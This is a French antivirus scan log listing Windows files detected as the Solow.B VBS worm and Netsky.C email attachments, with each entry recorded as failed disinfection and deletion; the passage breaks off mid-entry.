                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
                Supprimé

                C:\WINDOWS\pagefile.sys.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\WINDOWS\pagefile.sys.vbs=>(unicode)
                Echec de la désinfection

                C:\WINDOWS\pagefile.sys.vbs=>(unicode)
                Supprimé

                D:\pagefile.sys.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\pagefile.sys.vbs=>(unicode)
                Echec de la désinfection

                D:\pagefile.sys.vbs=>(unicode)
                Supprimé

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
                Infecté par: Win32.Netsky.C@mm.Damaged

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
                Echec de la désinfection

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
                Supprimé

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)
                Echec de la mise à jour

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
                Infecté par: Win32.Netsky.C@mm.Damaged

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
                Echec de la désinfection

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
                Supprimé

                D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)
                Echec de la mise à jour

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
                Supprimé

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
                Echec de la désinfection

                D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
                Supprimé

                F:\pagefile.sys.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\pagefile.sys.vbs=>(unicode)
                Echec de la désinfection

                F:\pagefile.sys.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
                Supprimé

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
                Echec de la désinfection

                F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
                Supprimé

                H:\pagefile.sys.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\pagefile.sys.vbs=>(unicode)
                Echec de la désinfection

                H:\pagefile.sys.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
